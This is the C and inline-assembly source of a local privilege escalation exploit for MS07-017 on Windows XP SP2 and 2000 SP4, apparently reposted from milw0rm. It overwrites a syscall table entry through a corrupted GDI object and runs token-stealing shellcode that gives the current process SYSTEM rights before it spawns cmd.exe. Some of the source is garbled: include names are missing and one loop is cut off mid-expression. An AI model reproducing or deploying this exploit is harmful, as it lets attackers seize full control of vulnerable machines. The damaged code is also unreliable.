#include #include #include #pragma comment (lib, "ntdll.lib")#pragma comment (lib, "shlwapi.lib")typedef LONG NTSTATUS;#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) typedef struct _GDI_TABLE_ENTRY { DWORD pKernelInfo; WORD ProcessID; WORD _nCount; WORD nUpper; WORD nType; DWORD pUserInfo;} GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY;typedef struct _IMAGE_FIXUP_ENTRY { WORD offset:12; WORD type:4;} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;typedef enum _SECTION_INFORMATION_CLASS {SectionBasicInformation,SectionImageInformation}SECTION_INFORMATION_CLASS; typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0PVOID BaseAddress;ULONG Attributes;LARGE_INTEGER Size;}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;typedef struct _UNICODE_STRING {USHORT Length;USHORT MaximumLength;PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING;typedef enum _SYSTEM_INFORMATION_CLASS {SystemModuleInformation=11,} SYSTEM_INFORMATION_CLASS;typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11ULONG Reserved[2];PVOID Base;ULONG Size;ULONG Flags;USHORT Index;USHORT Unknown;USHORT LoadCount;USHORT ModuleNameOffset;CHAR ImageName[256];} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; extern "C"NTSTATUS NTAPINtQuerySection(IN HANDLE SectionHandle,IN SECTION_INFORMATION_CLASS SectionInformationClass,OUT PVOID SectionInformation,IN ULONG SectionInformationLength,OUT PULONG ResultLength OPTIONAL);extern "C"NTSTATUS NTAPINtAllocateVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress,IN ULONG ZeroBits,IN OUT PULONG AllocationSize,IN ULONG AllocationType,IN ULONG Protect);extern "C"NTSTATUSNTAPINtQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass,IN OUT PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength OPTIONAL);extern "C"PIMAGE_NT_HEADERSNTAPIRtlImageNtHeader ( IN PVOID Base );extern "C"PVOIDNTAPIRtlImageDirectoryEntryToData ( IN PVOID Base, IN BOOLEAN MappedAsImage, IN USHORT DirectoryEntry, OUT PULONG Size );ULONG MyBuffer[500];PCHAR Temp[10];DWORDGetKernelBase(VOID){NTSTATUSstatus = STATUS_SUCCESS;ULONGi = 0;ULONGNeedSize = 0;ULONGModuleTotal = 0;DWORDdwKernelBase = 0;PSYSTEM_MODULE_INFORMATIONSystemModuleInfo = NULL;status = NtQuerySystemInformation(SystemModuleInformation, (PVOID)Temp, 10, &NeedSize );if( status != STATUS_INFO_LENGTH_MISMATCH ) {printf("NtQuerySystemInformation (first) failed, status: %08X/n", status );return dwKernelBase;}SystemModuleInfo = (PSYSTEM_MODULE_INFORMATION)LocalAlloc( LPTR, NeedSize );if ( NULL == SystemModuleInfo ) {printf("NtQuerySystemInformation failed (second), code: %08X/n", GetLastError() );return dwKernelBase;}status = NtQuerySystemInformation(SystemModuleInformation, SystemModuleInfo, NeedSize, &NeedSize );if( status != STATUS_SUCCESS ) {printf("NtQuerySystemInformation failed, status: %08X/n", status );return dwKernelBase;}ModuleTotal = *(PULONG)SystemModuleInfo;SystemModuleInfo = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)SystemModuleInfo+4);for( i=0; iSizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) >> 1;i++, ImageFixup++ ) {if ( ImageFixup->type == IMAGE_REL_BASED_HIGHLOW ) {dwVirtualAddress = ImageBaseReloc->VirtualAddress + ImageFixup->offset;dwRva = *(PDWORD)((DWORD)hModule+dwVirtualAddress) - (DWORD)NtHeaders->OptionalHeader.ImageBase;if ( dwRva == dwKeSDTOffset ) {if (*(PWORD)((DWORD)hModule + dwVirtualAddress-2) == 0x05c7) {dwKiServiceTable = *(PDWORD)((DWORD)hModule + dwVirtualAddress+4) - NtHeaders->OptionalHeader.ImageBase;return dwKiServiceTable;}}}}*(PDWORD)&ImageBaseReloc += ImageBaseReloc->SizeOfBlock;} while ( ImageBaseReloc->VirtualAddress );return 0;}VOIDSetShellCodeToMemory(PVOIDShellCodeMemory){OSVERSIONINFOEXOsVersionInfo;RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);if ( OsVersionInfo.dwMajorVersion != 5 ) {printf( "Not NT5 system/n" );ExitProcess( 0 );return;}if ( OsVersionInfo.dwMinorVersion == 0 ) {__asm {call Copy2KShellCodenopnopnopnopnopnopmoveax,0xFFDFF124// eax = KPCR(not 3G Mode)mov eax,[eax]//// 其他版本的shellcode请自己修改偏移, 谢谢//movesi,[eax+0x44]moveax,esisearch2K:moveax,[eax+0xa0]subeax,0xa0movedx,[eax+0x9c]cmpedx,0x8// Find System Processjnesearch2Kmoveax,[eax+0x12c]// 获取system进程的tokenmov[esi+0x12c],eax// 修改当前进程的tokenret 8Copy2KShellCode:pop esimov edi, ShellCodeMemorylea ecx, Copy2KShellCodesub ecx, esicldrep movsb}} else if ( OsVersionInfo.dwMinorVersion == 1 ) {__asm {call CopyXpShellCodenopnopnopnopnopnopmoveax,0xFFDFF124// eax = KPCR(not 3G Mode)mov eax,[eax]//// 其他版本的shellcode请自己修改偏移, 谢谢//movesi,[eax+0x220]moveax,esisearchXp:moveax,[eax+0x88]subeax,0x88movedx,[eax+0x84]cmpedx,0x4// Find System ProcessjnesearchXpmoveax,[eax+0xc8]// 获取system进程的tokenmov[esi+0xc8],eax// 修改当前进程的tokenret 8CopyXpShellCode:pop esimov edi, ShellCodeMemorylea ecx, CopyXpShellCodesub ecx, esicldrep movsb}} else {ExitProcess(0);}}int main(int argc, char* argv[]){NTSTATUSstatus;DWORDdwKernelBase = 0;HMODULEhModule = NULL;PVOIDKeServiceDescriptorTable = NULL;DWORDdwKeSDTOffset = 0;DWORDdwKiServiceTable = 0;PVOIDZwVdmControl = NULL;DWORDFuncNumber = 0;DWORDHookAddress = 0;HBRUSHhBrush;PVOIDShellCodeMemory = (PVOID)0x2;DWORDMemorySize = 0x1000;WORDUpr;LPVOIDlpMapAddress = NULL;HANDLEhMapFile = (HANDLE)0x10;DWORDi;ULONGhPid;DWORDOldKernelInfo;PGDI_TABLE_ENTRYGdiTableEntry = NULL;SECTION_BASIC_INFORMATIONSectionBaseInfo;PROCESS_INFORMATIONpi;STARTUPINFOAstStartup;printf( "MS07-017 Local Privilege Escalation Vulnerability Exploit/n/n" );printf( "Tested on: /n/twindows xp sp2/n/twindows 2000 sp4 Chinese (before MS07-017) /n/n" );printf( "/tCoded by Ivanlef0u, shadow3 modified/n/n" );dwKernelBase = GetKernelBase();if ( dwKernelBase == 0 ) {printf("GetKernelBase failed/n" );return 0;}printf( "Get KernelBase Success, ntoskrnl.exe base = %08X/n", dwKernelBase );printf( "Mapping ntoskrnl.exe ... " );hModule = LoadLibrary("ntoskrnl.exe");if ( NULL == hModule ) {printf("/nLoadLibrary failed, code: %d/n", GetLastError() );return 0;}printf( "ok/n" );KeServiceDescriptorTable = GetProcAddress( hModule, "KeServiceDescriptorTable" );if ( NULL == KeServiceDescriptorTable ) {printf("GetProcAddress failed, code: %d/n", GetLastError() );FreeLibrary( hModule );return 0;}printf( "KeServiceDescriptorTable = %08X/n", KeServiceDescriptorTable );printf( "Find KiServiceTable ... " );dwKeSDTOffset = (DWORD)KeServiceDescriptorTable - (DWORD)hModule;dwKiServiceTable = FindKiServiceTable( hModule, dwKeSDTOffset );if ( 0 == dwKiServiceTable ) {printf( "failed/n" );FreeLibrary( hModule );return 0;}printf( "ok!!!/nKiServiceTable == %08X/n", dwKiServiceTable + dwKernelBase );FreeLibrary( hModule );hModule = LoadLibrary( "ntdll.dll" );if ( NULL == hModule ) {printf("/nLoadLibrary failed, code: %d/n", GetLastError() );return 0;}printf( "Get ZwVdmControl Number ... " );ZwVdmControl = GetProcAddress( hModule, "ZwVdmControl" );if ( NULL == ZwVdmControl ) {printf("failed/nGetProcAddress failed, code: %d/n", GetLastError() );FreeLibrary( hModule );return 0;}FuncNumber = *(PDWORD)((DWORD)ZwVdmControl + 1);printf( "ok!/n" );printf( "ZwVdmControl Call Number: %08X/n", FuncNumber );HookAddress = (DWORD)( dwKiServiceTable + dwKernelBase + FuncNumber * sizeof(DWORD) );status = NtAllocateVirtualMemory( (HANDLE)-1, &ShellCodeMemory, 0, &MemorySize, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE );if ( status != STATUS_SUCCESS ) {printf( "NtAllocateVirtualMemory failed, status: %08X/n", status );return 0;}//// 初始化 ShellCode//memset( ShellCodeMemory, 0x90, MemorySize );SetShellCodeToMemory( ShellCodeMemory );hBrush = CreateSolidBrush(0);Upr = (WORD)((DWORD)hBrush>>16);while(!lpMapAddress) {hMapFile = (HANDLE)((ULONG)hMapFile + 1);lpMapAddress = MapViewOfFile( hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);}if( lpMapAddress == NULL ) {printf("MapViewOfFile failed, code: %d/n", GetLastError()); return 0;}status=NtQuerySection( hMapFile, SectionBasicInformation, &SectionBaseInfo, sizeof(SECTION_BASIC_INFORMATION), 0 );if ( status != STATUS_SUCCESS ) {printf("NtQuerySection failed, status: %08X/n", status); return 0;}printf( "Find GdiTableEntry ... " );GdiTableEntry = (PGDI_TABLE_ENTRY)lpMapAddress;hPid = GetCurrentProcessId();memset( MyBuffer, 0x90, sizeof(MyBuffer) );for ( i = 0; i < SectionBaseInfo.Size.QuadPart; i += sizeof(GDI_TABLE_ENTRY) ) {if( GdiTableEntry->ProcessID == hPid && GdiTableEntry->nUpper == Upr ) {OldKernelInfo = GdiTableEntry->pKernelInfo;GdiTableEntry->pKernelInfo = (ULONG)MyBuffer;break;}GdiTableEntry++;}printf( "ok/n" );DeleteObject( hBrush );printf( "ZwVdmControl -> My Shellcode, modifiable KiServiceTable/n" ); MyBuffer[0]=0x1; //!=0 MyBuffer[0x24/4]= HookAddress; //syscall to modifYMyBuffer[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptrDeleteObject( hBrush );GdiTableEntry->pKernelInfo = OldKernelInfo;printf( "call shellcode ... " );_asm {xor ecx,ecxpush ecxpush ecxmov eax, ZwVdmControlcall eax}printf( "Done./n" );printf( "Create New Process/n" );GetStartupInfo( &stStartup );CreateProcess( NULL,"cmd.exe",NULL,NULL,TRUE,NULL,NULL,NULL,&stStartup,&pi );return 0;}原程序出处: http://www.milw0rm.com/exploits/3688 |
